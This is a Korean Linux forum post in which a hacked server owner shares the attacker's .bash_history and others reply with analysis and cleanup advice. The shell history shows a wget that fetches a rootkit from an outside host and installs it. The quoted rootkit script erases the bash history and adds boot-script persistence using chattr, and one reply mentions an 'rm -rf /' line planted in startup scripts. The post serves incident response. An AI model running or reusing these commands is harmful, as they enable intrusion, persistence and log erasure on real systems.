DBuser 게시판 그룹 > 정보자료실 > 해킹을 당했는데 .bash


		344
		228
		994
		75,227

현재접속자 : 6 (회원 0)

홈 > 정보자료실

	제 목			[linux] 해킹을 당했는데 .bash_history파일 내용입니다

글쓴이

앙상한삶의혼

날 짜

06-01-17 16:40

조회(1284)

트랙백 주소 : http://netcop.woobi.co.kr/bbs/tb.php/k_pds/12

해킹을 당했는데 .bash_history파일 내용입니다

id
wget x-m-a-n.com/rk.tgz
tar xzf rk.tgz
rm -rf rk.tgz
cd .rk
./install
w
hostname
/sbin/ifconfig

이런 내용인데 find명령으로 백도어삭제해도 조금 지나면 다시 생기고
promisc이게 계속 ifconfig 3번째 라인에 생기면서 백도어가 계속 생성이 됩니다.
어떻게 해야좋을지 모르겠어여
완전히 삭제하는 방법좀 가르쳐 주세요

============================================================================

wget x-m-a-n.com/rk.tgz

백도어 프로그램에대한 분석..

echo "taking over the server..."
tar xvfz sshd.gz -C /
rm -rf /root/.bash_history /// root 의 .bash_history 파일을 삭제.....
ln -s /dev/null /root/.bash_history // 그리고 .bash_history 로그흔적이 남지 않게 장치값으로 보낸다...

1.
# find /dev -type f
위와 같은 명령으로 쓸데없는 파일들(-_-)이 존재하는지 확인합니다. 보통 /dev/MAKEDEV 등과 같이 device 를 관리하고자 하는 파일 이외의 것이 검색되면 일단 의심해봐야 합니다. 그리고 습성상 디렉토리명칭을 공백 한바이트(" ")나 "..." 등과 같이 dot 3개 정도로 생성하여 쉽게 눈에 띄지 않게 하기도 하므로 이런 형태의 파일이나 디렉토리도 찾아보시기 바랍니다.

2.
# grep -v "^#" /etc/inetd.conf
위와 같은 명령으로 불필요한(또는 크래커가 추가한) 서버에 관한 설정이 추가되어 있는지 확인합니다.

3.
# netstat -an | grep LISTEN
위와 같은 명령으로 서버에 열린 포트를 확인하여 의심가는 포트가 있다면 포트를 물고 있는 데몬을 찾아 봅니다.

4.
/etc/passwd 파일을 열어서 최근에 추가된 사용자나 얍샵하게 기존 사용자정보 사이에 숨겨둔 크래커의 일반계정이 존재하는지 확인합니다.

5.
시스템의 부트스크립트(/etc 경로 하단)에 백도어를 실행하는 등의 악성코드가 존재하는지 확인합니다.

6.
필요할 경우 다음과 같이 find 명령의 시간옵션을 주어 최근에 변경된 파일들을 찾아볼 수도 있겠습니다만, 크래커가 파일 수정일자까지도 변조했다면 별로 유익한 방법이 되지 못할 수도 있습니다.
# find / -ctime -30 -type f

7.
포트를 이용한 백도어 뿐만 아니라 루트쉘을 얻도록 구성된 백도어가 구성되어 있을 수 있으므로 시스템 내의 Set User ID(SUID) 파일들을 죄다 훑어봐서 악성코드나 악성쉘이 아닌지 확인합니다.

3차적인 권고
침입자가 슈퍼유저 권한을 획득했었다면 시스템을 재설치하는 것이 필수라고 감히 말씀드리고 싶습니다.
아시듯이 유닉스 계열에서 슈퍼유저 권한은 절대적인 지위에 있습니다. 소프트웨어적인 어떠한 작업이라도 가능하다는 이야기 입니다.

고생끝에 보안구멍을 모두 막았노라고 장담하실 수도 있겠지만, /etc 디렉토리 밑에 위치한 파일이나 경로중 어느 하나라도 일반 사용자에게 쓰기권한이 부여되어 있을 경우 재수없으면 또 다시 악몽이 시작될 수 있습니다. 침입자가 앙증맞게도 일반사용자로 로그인 하여 /etc/rc.d/rc.local 파일과 같이 슈퍼유저권한으로 자동으로 실행되는 스크립트파일(/etc/sysconfig/network 등 대부분의 스크립트)에 rm -rf / 라는 줄을 삽입하게되면 아좌주~ 재미있는 사태가 벌어지겠지요. 그만큼 슈퍼유저권한을 한번쯤 잃은 서버라면 99%이상 신뢰할 수 없습니다. 파일의 무결성을 확인할 수 있는 tripwire 등을 사용하지 않던 서버라면 무조건 재설치하시는게 좋습니다.

루트 킷이 깔려있을 경우에 대해서 이야기하고 있습니다.

shadow passwd 가 풀리고, name daemon, ps ,top , inetd등 수많은 데몬을 바꾸어 놓고요. 증상으로는 w , who 등 현재 사용자 현황을 전혀 보실수 없고 top 명령을 쓰면 화면이 안나올 겁니다.

패스워드 화일을 잘 살펴 보세요. 최근에 만들어진 UID 가 높은 계정부터 그러니까 tail -15 /etc/passwd 해보시면 될겁니다. 모르는 계정이 있거나 그러시면 계정 dir로 가보세요. 만약 계정에 lrk.tgz 화일이 있다면 이미 해킹당하고, 중요한 데몬 대부분을 바꾸구 난 뒤 입니다.

들어 오는 방법은 FTP로 접속해서 ROOT권한을 획득해서 당당하게 계정을 만든후 lrk.tgz를 ftp로 업로드후 실행시킨후 사라집니다. 이걸 복구 할려면, linux 를 다시 Install 시키셔야 합니다. 물론 lrk/install 을 보면 무엇을 바f는지 알수 있으니까 그것만 구하셔서 다시까셔도 됩니다. 개인용 컴퓨터에 서버에 깔린 것이랑 같은 버전의 Linux를 설치하시고 프로그램들을 덮어 쓰셔도 되지만. install에 써 있는거 이외에 다른것도 설치 했을수도 있지때문에 다시 설치하시는것이 좋습니다.

원래 한번 해킹당하면 /home과 /etc만 백업받고 나머지는 날려버리는게 가장 안정하죠. 파티션 다시 잡을 필요도 없고 포맷시킬필요도 없이, 그냥 덮어 쓰면 되구요. 그전에 /etc 를 백업 받으셔서 /home 밑에 넣어 놓으시기 바랍니다. 그리고 다시 /etc에서 text로 된 설정화일 들만 Copy 하시면 됩니다. 절대 binary File 은 Copy 하시면 안됩니다. ( -

아래는 시스템 파일들을 감염....변조...
echo "Gata am terminat de instalat programele..."
cd ..
rm -rf .rk
rm -rf x3.gz
echo "E pe terminate rootarea ..."
/usr/lib/setup
/usr/bin/chattr -i /etc/rc.d/rc.sysinit >/dev/null
/usr/bin/chattr -i /etc/rc.d/rc.local >/dev/null
echo "/usr/lib/setup" >> /etc/rc.d/rc.sysinit
echo "/usr/lib/setup" >> /etc/rc.d/rc.local
/usr/bin/chattr +i /etc/rc.d/rc.local >/dev/null
/usr/bin/chattr +i /etc/rc.d/rc.sysinit >/dev/null
echo "Be Strong Baby :-) CTRL+C"

제설치 하세요....